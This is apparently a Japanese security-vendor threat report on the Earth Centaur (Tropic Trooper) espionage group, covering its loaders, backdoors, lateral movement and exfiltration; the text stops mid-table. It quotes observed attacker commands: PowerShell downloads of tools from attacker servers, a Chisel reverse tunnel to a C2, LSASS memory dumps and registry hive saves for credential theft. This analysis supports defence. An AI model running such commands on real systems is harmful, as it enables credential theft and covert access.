APT&標的型攻撃
運輸や政府を狙うサイバー諜報活動集団「Tropic Trooper=Earth Centaur」の手口を解説
「Tropic Trooper(別名:Pirate Panda, KeyBoy)」は、トレンドマイクロの調査では、2011年からの長期的な活動を確認しているサイバー諜報活動グループです。特に2020年7月に同グループのものと考えられる興味深い活動を確認して以来、注意深く監視を続けています。
「Tropic Trooper(別名:Pirate Panda, KeyBoy)」は、トレンドマイクロの調査では、2011年からの長期的な活動を確認しているサイバー諜報活動グループです。特に2020年7月に同グループのものと考えられる興味深い活動を確認して以来、注意深く監視を続けています。トレンドマイクロではこの新たな活動を強調するため「Earth Centaur」と命名しました。本記事でも以降、Earth Centaurグループと呼称します。
トレンドマイクロは、Earth Centaurグループが一部の内部文書(フライトスケジュールや財務計画に関する文書など)や、侵害したホスト上の個人情報(検索履歴など)にアクセスしようとした試みを観測しました。本稿執筆時点では、Earth Centaurグループによって引き起こされたこれらの事例における実質的な被害は確認されていません。しかしながらトレンドマイクロは、同グループが感染システムの内部情報を収集しながら、それらのデータを悪用する機会をうかがっている状況に過ぎないと推測しています。
さらにトレンドマイクロは、長期的な監視を通じて、Earth Centaurグループが攻撃技術に特化したレッドチーム的な技能に精通していることに気付きました。Earth Centaurグループは、様々なセキュリティ設定を回避する方法を把握しており、自身の攻撃活動継続のために様々な検知を免れる手法を使用します。例えば、Earth Centaurグループは、侵害したシステムに応じて異なるプロトコルを用いるバックドア型マルウェアを使用するほか、リバースプロキシを使ってネットワークセキュリティシステムの監視を回避する手口の使用も確認しています。また、Earth Centaurグループはオープンソースのフレームワークを悪用することで、新たなバックドアの亜種を効率的に開発することもあります。これらの手法やその他の機能については、以下のセクションで詳説します。
Earth Centaurグループの主なターゲットは、運輸業界に属する組織や運輸に関連する政府機関であるようです。ただし、今回トレンドマイクロが観測した攻撃活動は氷山の一角に過ぎず、攻撃対象が運輸に関連する別の業界にまで拡大している可能性もあります。本ブログ記事を通じて、企業が自社のセキュリティ設定を見直し、サイバー攻撃により生じる損害やセキュリティ侵害に対する安全対策の向上に寄与できることを切に願っています。
■Earth Centaurグループが用いる感染チェーンの概要
トレンドマイクロによる追跡調査の結果、Earth Centaurグループが用いた侵入プロセスは、図1に示すようにいくつかの段階に分けることができることがわかりました。
トレンドマイクロは、攻撃者がInternet Information Services(IIS) serverまたはExchange serverの脆弱性をエントリポイント(侵入口)として悪用した後、Webシェルをインストールしていたことを確認しました。その後、侵害したシステム上に.NETローダ(「Nerapack」として検出)および第一段階のバックドア(Quasar Remote Administration Tool:Quasar RAT)が展開されました。次に攻撃者は、侵害したシステムに応じて「ChiserClient」や「SmileSvr」などの異なる種類のバックドアを第二段階として作成しました。
脆弱なシステム環境を侵害することに成功した後、攻撃者はActive Directory(AD)の探索を開始し、Server Message Block(SMB)を介して自身の攻撃ツールを拡散します。その後、攻撃者は、イントラネットでのペネトレーションツールを用いて、侵害したシステムが接続されているイントラネットと自身の管理する遠隔操作サーバ(C&Cサーバ)との間で接続を構築します。これらの各段階については、以下に詳説します。
図1:Earth Centaurグループが用いた侵入プロセスの各段階と流れ
■ Earth Centaurグループが用いた攻撃ツールや手法に関する技術的解析
第一段階:ローダ
攻撃者は、Microsoft Exchange Serverの脆弱性「ProxyLogon」を突く攻撃ツール(エクスプロイト)やWebシェルを用いて脆弱なホストにアクセスした後、bitsadminコマンドを使って、第一段階で用いるローダ(「Nerapack」として検出)およびペイロードファイル(.bin)をダウンロードします。
C:\Windows\system32\windowspowershell\v1.0\powershell.exe -Command "&{Import-Module BitsTransfer; Start-BitsTransfer 'http://<redacted>:8000/dfmanager.exe' "%temp%/dfmanager.exe"}"
C:\Windows\system32\windowspowershell\v1.0\powershell.exe -Command "&{Import-Module BitsTransfer; Start-BitsTransfer 'http://<redacted>:8000/dfmanager.bin' "C:\Users\<redacted>\AppData\Local\Temp/dfmanager.bin"}"
長期的な監視によりトレンドマイクロは、ペイロードを復号するためにNerapack内で使用される2つの異なる復号アルゴリズム(DESおよびAES)が存在することを観測しました。さらにNerapackの新たなバージョンでは、「タイムストンピング(Timestomping)」と呼ばれる手法が用いられています(図2)。タイムストンピングとは、ペイロードファイル(.bin)のタイムスタンプを改ざんすることです。これにより、特定の時系列を追うインシデント対応チームの調査が困難化する場合があります。
図2:ペイロードファイル(.bin)に用いられたタイムストンピングの手法
復号鍵はNerapackの引数として使用されるほか、さまざまな鍵が異なる感染システム上で用いられます。これは、セキュリティ解析を困難にし、攻撃者だけが同ツールを使用できるようにする、シンプルかつ効果的な手法です。
実行コマンドは次のように表示されます。
> Nerapack.exe {Base64 encoded key}
幸いなことにトレンドマイクロは、いくつかの事例で復号鍵を収集することができたため、ペイロードの復号に成功しました。今回の事例で復号されたペイロードはQuasar RATでした。ペイロードが展開された後、攻撃者はQuasar RATを通じた遠隔操作により、さらなる不正活動を継続することができます。
第二段階:バックドア
トレンドマイクロはさらに解析を進めたことで、Earth Centaurグループが一般的なネットワークプロトコルを介して通信のやり取りが可能な複数のバックドアを開発していたことを突き止めました。これは、一般的なプロトコルを用いてデータを転送することで、他の正規の通信に自身の通信を紛れさせて検出を困難化させる目的と考えられます。さらにトレンドマイクロは、同グループが侵害したシステムごとに異なるバックドアを起動しようと試みていたことを発見しました。また、同グループが既存のフレームワークを悪用して改変したバックドアを作成する傾向も見られました。以下に具体例を示しますが、Earth Centaurグループは侵害したシステム内の既存のフレームワークを悪用することで、より効率的に新たなバックドアの亜種を作成します。
●バックドア「ChiserClient」
バックドア「ChiserClient」は実行されると、図3に示すURLに接続するために、埋め込まれたC&Cサーバの構成をAES(CTRモード)アルゴリズムで復号します。この構成には、C&CサーバのURL3つとそれらに対応するポート番号が含まれています。
図3:復号されたC&Cサーバの構成
ChiserClientはC&Cサーバに初めて接続する際にチェックインする目的のために、侵害したシステムのホスト名を付加します。その後、侵害したホスト上での動作を継続し、C&Cサーバから送られてくるさらなるコマンドを待機します。
攻撃者は、ChiserClientをシステムサービスとしてインストールさせることで、より高い権限にアクセスできるようになるほか、侵害したホスト上での活動の持続化を維持できるようになります。ChiserClientの機能を以下の表1に示します。
| コマンドコード | 機能 |
| 0x10001 | 指定されたファイルを書き込む |
| 0x10002 | ファイルをダウンロードする |
| 0x10003 | 指定されたファイルを読み込む |
| 0x10004 | 動作なし |
| 0x10005 | コマンドを実行するためにコマンドシェルを開く |
表1:バックドア「ChiserClient」の機能
●バックドア「HTShell」
HTShellは、Mongooseフレームワーク(バージョン6.15)を用いて開発されたシンプルなバックドアです。Mongooseは「MongoDB」および「Node.Js」用オブジェクトデータモデル(ODM)のライブラリで、コード内のオブジェクトとMongoDB内のオブジェクト表現との間の変換に用いられます。
今回の事例でトレンドマイクロは、感染システム上でHTShellクライアントがシステムサービスとして起動されたのち、C&Cサーバに接続することを確認しました。HTShellは、追加される構成ファイルのインポートに対応します。追加される構成ファイルは「%PUBLIC%Documents\sdcsvc.dat」内に存在し、コンテンツはBase64でエンコードされている必要があることがわかりました(図4)。構成ファイルがインポートされていない場合、HTShellは、事前に定義されたC&CサーバのURLに接続します。
図4:HTShellにより追加されるエンコードされた構成ファイルと、事前に定義されたC&CサーバのURL
HTShellは、ハードコードされた文字列「tp===」をカスタムBase64でエンコードした後、エンコードした文字列をHTTPリクエストヘッダに格納されるCookie内に埋め込みます(図5)。C&Cサーバがこの特別なCookieの値を持つHTTPリクエストを受信する場合、そのリクエストがクライアントアプリケーションから送られてきたものであると確かめることができます。
図5:HTShellがハードコードされた文字列をエンコードした後、HTTPリクエストヘッダに格納されるCookie内に埋め込んだ様子
HTShellのHTTPリクエストハンドラは、受信したコマンドのコマンドコードと引数を区切るためのデリミタとして「`」を使用します。これにより、コマンドは以下のような形式になります。
<command code>`<custom-base64encoded-data>[`<more-custom-base64encoded-data>]
HTShellは本稿執筆時点で、以下に示す3つの異なるバックドア機能に対応しています。
| コマンドコード | 機能 |
| 0 | コマンドを実行するためにコマンドシェルを開く |
| 1 | ファイルをアップロードする |
| 2 | ファイルをダウンロードする |
表2:バックドア「HTShell」の機能
●OSSの「Lilith RAT」を改変して作成されたバックドア
トレンドマイクロはEarth Centaursグループの活動を調査する中で、Lilith RATと呼ばれるバックドアが使用されていることも突き止めました。このLilith RATは、オープンソースのLilith RATを高度に改変したものであると考えられます。攻撃者は、一部のコマンド実行用コードを再利用していますが、C&C通信プロトコルはDropbox HTTPS APIに変更されています。
図6:オープンソース「Lilith RAT」のコードが一部再利用されている
攻撃者は、このLilith RATを起動するために「Phantom Evasion DLLハイジャッキング」と呼ばれる手法を使用します。攻撃者は、この手法を用いるためにLilith RATを正規のwlbsctrl.dllに偽装させます。これによりWindowsサービス「IKEEXT」が開始されている間、偽のwlbsctrl.dllが読み込まれて高い権限で実行されます。加えてLilith RATは強制終了されるときに、リサーチャに発見されないようにするために自身を削除しようと試みます(図7)。
図7:実行後に自身を削除するためのコード
改変されたLilith RATはC&Cサーバと接続する際、はじめに攻撃者のDropbox内を検査して、侵害したホストが存在するかどうかを確認します。存在しない場合、Lilith RATは感染システムのホスト名とIPアドレスを収集して既存の侵害したホスト情報に追加します(図8)。その後、すべてのデータは暗号化されて送り返されます。
図8:新たに侵害したホスト情報が攻撃者のDropbox内に追加された様子
| コマンド | 説明 |
| CMDCommand | コマンドを実行する |
| DownloadCloudFile | ファイルをダウンロードする |
| UploadCloudFile | ファイルをアップロードする |
| GetDir | ディレクトリを一覧表示する |
| GetDirFile | ディレクトリ内のファイルを一覧表示する |
| DeleteSelf | 自身を削除する |
表3:C&Cサーバから送られてくるコマンドの一覧
●SmileSvr
トレンドマイクロは、2つのタイプの「SmileSvr」を発見しました。2つの亜種の違いは、通信に用いるプロトコル「ICMP」と「SSL」にあります。攻撃者は、インストーラを用いて「SmileSvr」をシステムサービスとしてインストールし、エンコードされたC&Cサーバの情報を含むDATファイルを作成します。構成ファイル内では、C&CサーバのURLを格納するために用いるメモリサイズやC&CサーバのURLが定義されます。
図9:エンコードされた構成ファイル
ICMP版SmileSvrは、構成ファイル内で定義された特定のC&CサーバのURLに接続するためにICMPソケットを作成します。各SmileSvrには埋め込まれた番号(例:図10に示す10601)が存在し、この値は送信されたICMPパケット内のシーケンス番号として使用されます。攻撃者はこの値を使って、送られてくるパケットが自身のバックドアに属するものかどうかを確認し、ノイズを除去していると考えられます。
図10:復号された構成ファイル
C&Cサーバから送られてくる実際のトラフィックを確認できなかったため、受信機能に基づいて返されるコンテンツを推測することしかできませんでした。図11に示すように、C&Cサーバから返されるコンテンツには、受信したデータが正しい送信元から送られてきたものかどうかを確認するために使用するシーケンス番号と、暗号化されたデータのブロックが2つ含まれているはずです。
データの復号プロセスを以下に示します。
- まず、暗号化されたデータが1バイトのXOR鍵(0xFF)で復号されます。
- 最初に復号されたコンテンツには、次のブロック内のデータを確認するために使用されるマジックナンバー、コマンドコード、および次のブロック内の暗号化されたコンテンツを復号するためのXOR鍵が含まれています。
- 次のブロック内の暗号化されたコンテンツは、最初に復号されたコンテンツのXOR鍵(0x99)で復号されます。復号されたデータ内には、以下の手順に関する指示が含まれています。
図11:トレンドマイクロが推測した「SmileSvr」に返されるコンテンツ
トレンドマイクロは2つのタイプの「SmileSvr」を解析する中で、C&Cサーバの活動がすでに停止されていることに気付きました。SmileSvrとC&Cサーバ間のトラフィックを確認できなかったため、すべての機能を把握することはできませんでした。ただし、大体のバックドア機能を以下の表4に示します。
| コマンドコード | 機能 |
| 0x5001 | 指定されたファイルを開く / 読み込む |
| 0x5002 | 不明 |
| 0x5004 | 指定されたファイルを開く / 書き込む |
| 0x5006 | コマンドシェルを開く |
| 0x5007 | 不明 |
| 0x5009 | コマンドシェルを閉じる |
| 0x500A | ディレクトリトラバーサル |
| 0x500C | システム環境情報を検査する |
| 0x500E | 不明 |
表4:バックドア「SmileSvr」の機能
SSL版SmileSvrは、C言語ベースの軽量なSSL/TLSライブラリ「wolfSSL」を悪用してSSL通信環境を構築します。SSL版SmileSvrが持つバックドア機能は、ICMP版の機能に類似しています。攻撃者は構築したSSL通信環境を使って、暗号化されたチャネルを介したデータ転送に対応する新たな方法を開発します。
●改変された遠隔操作ツール「Gh0st RAT」
トレンドマイクロは調査中に「telegram.exe」という不審な実行ファイルを発見しました。このファイルを解析した結果、遠隔操作ツール「Gh0st RAT」の改変版であることが判明しました。元のGh0st RAT(Gh0st beta 3.6)と比較すると、改変版は、侵害したホスト上のアクティブなセッションから情報を見つけ出す新たな機能に対応していることがわかりました。
改変版Gh0stが対応しているすべての機能を以下の表5に示します。
| コマンドコード | 機能 |
| 0xC8 | 接続を強制終了する |
| 0xCA | File Managerを用いてファイルを操作する |
| 0xCB | 侵害したシステムの画面を監視する |
| 0xCC | リモートシェルを開いてコマンドを実行する |
| 0XD5 | アクティブなセッション情報を取得する |
表5:改変された遠隔操作ツール「Gh0st RAT」の機能
■脆弱なシステムを侵害した後に実施された不正活動
脆弱なシステムを侵害することに成功した後、攻撃者は複数のハッキングツールを使って、感染システムの接続されているイントラネット上に存在する別のシステムを見つけ出して侵害することがわかりました。この攻撃段階では、窃取した情報を外部に送出させるためのツールを展開しようとする試みも観測されました。
トレンドマイクロは追跡調査する中で、表6に示す特定のツールが用いられていた証拠を発見しました。攻撃者はこれらのツールを用いることで段階的に自身の目標(ネットワーク内の探索、イントラネットへのアクセス、情報送出)を達成させていることがわかりました。
| ツール名 | 目標 | 説明 |
| SharpHound | Active Directoryの探索 | AD環境内における関係性を把握するための探索ツール |
| FRP | イントラネットへの侵入 | ネットワークアドレス変換(NAT:Network Address Translation)やファイアウォールの内側にあるローカルサーバをインターネットに公開するために用いられる高速リバースプロキシ |
| Chisel | イントラネット内への侵入 | 高速TCP / UDPトンネル |
| RClone | 情報送出 | 異なるクラウドストレージプロバイダとの間でファイルやディレクトリを同期するためのコマンドラインプログラム |
表6:攻撃者が用いるツール
認証情報ダンプ
さらにトレンドマイクロは、Earth Centaurグループが複数の正規ツールを悪用して、感染システム上に存在する認証情報をダンプしていたことも観測しました。攻撃者は正規ツールを用いることで自身の目標を達成させると同時に、自身の遠隔操作の隠蔽およびセキュリティ検知の回避を維持していました。
具体的な例として、Earth Centaurグループは「ProcDump.exe」(Microsoft社の正規ツール群「Windows Sysinternals Suite」内のプロセスのダンプツール)を用いて、bootsys.exeに改称しました。
c:\users\public\downloads\bootsys.exe -accepteula -ma lsass.exe C:\Users\Public\Downloads\lsass.dmp
Earth Centaurグループは、reg.exeを用いてレジストリ内に保存されている認証情報をダンプします。
reg.exe save hklm\sam C:\Users\Public\Downloads\sam.hive
reg.exe save hklm\sam c:\windows\temp\sa.dit
reg.exe save hklm\security c:\windows\temp\se.dit
reg.exe save hklm\system c:\windows\temp\sy.dit
さらにEarth Centaurグループは、comsvcs.dllを用いて指定されたプロセスからメモリをダンプします。
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 764 C:\Windows\TEMP\dump.bin full
不正活動の痕跡消去手口
攻撃者は、自身の活動の痕跡をリサーチャに発見されないようにするために、感染システム上のイベントログを消去する独自ツールを作成しました(図12)。攻撃者はこのツールを用いて指定したイベントログを消去し、リサーチャによる追跡調査を困難化させます。
使用例を以下に示します。
図12:イベントログを消去するツールを使用している様子
OSSを悪用したバックドア手口
脆弱なシステムを侵害することに成功した後、攻撃者はOSSの「FRP」および「Chisel」を作成します。FRPは、ネットワークアドレス変換やファイアウォールの内側にあるローカルサーバをインターネットに公開するために用いられる高速リバースプロキシであり、事前に定義された構成を読み取ることで、イントラネット内のホストをインターネットから利用できるようにします。
図13:高速リバースプロキシ「FRP」の構成
Chiselは、高速TCP / UDPトンネルであり、主にファイアウォールを通過させるために用いられます。Chiselは、Secure Shell(SSH)を介して保護されたHTTP経由でデータ転送を行う機能を提供します。これにより攻撃者は、ファイアウォールによる検査を通過して、ファイアウォールの内側にあるシステムにアクセスできるようになります。
以下は、PowerShellを介して高速リバースプロキシ「Chisel」をダウンロードするために用いられます。
c:\windows\system32\windowspowershell\v1.0\powershell.exe -command "$(new-object System.Net.WebClient).DownloadFile('https[:]//webadmin[.]mirrorstorage[.]org/ch.exe', 'ch.exe')"
以下は、Chiselを介したインターネット / イントラネット間の接続を構築するために用いられます。
C:\WINDOWS\system32\ch.exe client https[:]//webadmin[.]mirrorstorage[.]org:443 r:127.0.0.1:47586:socks
■情報送出の手口
トレンドマイクロは上記の段階で、攻撃者が複数のツールを用いてネットワークインフラの全体像を把握し、ファイアウォールを回避する手口を観測しました。その後トレンドマイクロは、クラウドストレージの同期ツール「Rclone」をダウンロードするために用いられたPowerShellコマンドを観測しました。Rcloneは、情報送出の手口に悪用されていました。さらにRcloneは、複数のクラウドストレージプロバイダにデータをコピーするための簡単かつ効率的な方法を提供します。
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -command "$(new-object System.Net.WebClient).DownloadFile('http://195[.]123[.]221[.]7:8080/rclone.exe', 'r.exe')"
これまでの経験上、Rcloneがランサムウェア攻撃で窃取したデータを外部に送出させるためにたびたび悪用されてきたことがわかっています。しかし現在はランサムウェア攻撃だけでなく、標的型攻撃での悪用も確認しています。
■Earth Centaurキャンペーンで特定された機能
長期的に監視・分析してきた結果、本記事で解説する攻撃キャンペーンがEarth Centaurグループによって運営されていることを示す有力な証拠を得ることができました。上記のセクションで解説した手法やツール内で、Earth Centaurグループが用いることで知られている機能がいくつか見つかりました。以下にそれらの要素を分けて解説します。
Mutexに用いられた文字列の形式
トレンドマイクロは、中国語注音符号キーボード配列によりエンコードされた特殊なMutexをバックドア「ChiserClient」内でいくつか発見しました。デコードされた文字列を以下の表7に示します。トレンドマイクロは、これらの特殊なMutexの文字列に基づき、攻撃者が中国語圏の出身であると推測しています。
| エンコードされた文字列 | デコードされた文字列(中国語) | 英語訳(日本語訳) |
| vul3ru,6q8 q8 y.3 | 小傑趴趴走 | Jack goes around(ジャックがあちこちと歩き回る) |
| ji394su3 | 我愛你 | I love you(私は貴方を愛している) |
| 5ji fu.6cl3g.3zj6m0694 | 桌球好手福原愛 | Excellent table tennis player, Ai Fukuhara(優秀な卓球選手、福原愛) |
表7:エンコード / デコードされたMutexの文字列
類似する構成形式
バックドア「ChiserClient」を解析したところ、Earth Centaurに関する以前の調査で紹介したバックドア「TClient」とネットワーク構成の形式が似ていることがわかりました(図14)。
図14:ネットワーク構成の比較図(左:ChiserClient、右:TClient)
コードの類似性
さらにバックドア「SmileSvr」を検査したところ、Earth Centaurグループが過去に「Tropic Trooper作戦」で用いた「Troj_YAHAMAM」とのコードの類似性を発見しました。双方を比較したところ、構成をデコードするコードが類似しています(図15)。さらに、構成ファイル内の異なる値を区切るためにSmileSvr内で使用されていたデリミタは、YAHAMAM内で使用されていたものと同じです(図16)。
図15:構成ファイルをデコードする関数を比較(左:SmileSvr、右:Troj_Yahamam)
図16:構成ファイル内の異なる値を区切るために用いられた関数を比較(左:SmileSvr、右:Troj_Yahamam)
■まとめ
これらの脅威の背後にいる攻撃者は、特に高度化に注力し、十分な技能を備えています。Earth Centaurグループが用いる新たな手法をさらに掘り下げて調査してみると、セキュリティ設定を潜り抜けながら感染システム環境の内情を偵察した後、ネットワーク内に存在する別のシステムを侵害するためのツールを数多く保有していることがわかりました。具体的な手法としてEarth Centaurグループは、感染システムの接続されているネットワークインフラを関連付けることで、ファイアウォールによる検知を回避することができます。また、感染システムに応じて展開される異なるプロトコルを用いるバックドアを使用します。さらに、さまざまなシステム環境内のセキュリティ監視を回避するツールを開発する能力もあるほか、脆弱なWebサイトを侵害してC&Cサーバとして悪用します。
本ブログ記事では、Earth Centaurグループに関連する新たな調査結果の概要をお伝えしました。感染システムネットワーク内への侵入を試みる脅威の手口や動作に関する情報は、セキュリティチームにとって非常に有益であり、脆弱なシステム環境を効果的に保護するために役立てることができます。さらに、それらの情報を既存のセキュリティ設定と照合することで、脅威が最終段階に達し企業に影響を及ぼす前に、攻撃活動、手法、挙動を捕捉し適切に対処できるセキュリティソリューションを見出すことができます。
■トレンドマイクロのソリューション
「Trend Micro Vision One™」は、XDR(Extended Detection and Response)ソリューションを超える付加価値と新たなメリットを提供し、企業が「より多くを把握し、迅速に対応する」という目的を実現する脅威防御のプラットフォームです。メール、エンドポイント、サーバ、クラウドワークロード、ネットワークといった複数のセキュリティレイヤーにまたがる情報を収集し、自動的に相関させる深く幅広いXDR機能を提供する「Trend Micro Vision One™」は、自動化された防御機能によって攻撃の大半を防ぐことが可能となります。
■Earth Centaurグループの攻撃手法
ATT&CK Matrix for ENTERPRISEにより分類したEarth CentaurグループのTTPは以下の通りです。
| 戦術(Tactics) | ID | 技術(Technique) |
| 初期アクセス(Initial access) | T1190 | Exploit public-facing application |
| 実行(Execution) | T1059.001 | Command and Scripting Interpreter: PowerShell |
| T1059.003 | Command and scripting interpreter: Windows Command Shell | |
| T1569.002 | System Services: Service Execution | |
| 活動の持続化(Persistence) | T1543.003 | Create or Modify System Process: Windows Service |
| T1574.002 | Hijack Execution Flow: DLL Side-Loading | |
| T1505.003 | Server Software Component: Web Shell | |
| セキュリティ回避(Defense evasion) | T1140 | Deobfuscate/Decode Files or Information |
| T1480 | Execution Guardrails | |
| T1574.002 | Hijack Execution Flow: DLL Side-Loading | |
| T1070.001 | Indicator Removal on Host: Clear Windows Event Logs | |
| T1027.002 | Obfuscated Files or Information: Software Packing | |
| T1218.011 | Signed Binary Proxy Execution: Rundll32 | |
| T1036.005 | Masquerading: Match Legitimate Name or Location | |
| T1197 | BITS Jobs | |
| T1070.006 | Indicator Removal on Host: Timestomp | |
| 認証情報へのアクセス(Credential Access) | T1003.001 | OS Credential Dumping: LSASS Memory |
| T1552.002 | OS Credential Dumping: Credentials in Registry | |
| 内部活動(Lateral Movement) | T1021.002 | Remote Services: SMB/Windows Admin Shares |
| 探索(Discovery) | T1087.002 | Account Discovery: Domain Account |
| T1482 | Domain Trust Discovery | |
| T1083 | File and Directory Discovery | |
| 情報収集(Collection) | T1005 | Data from Local System |
| 遠隔操作(C |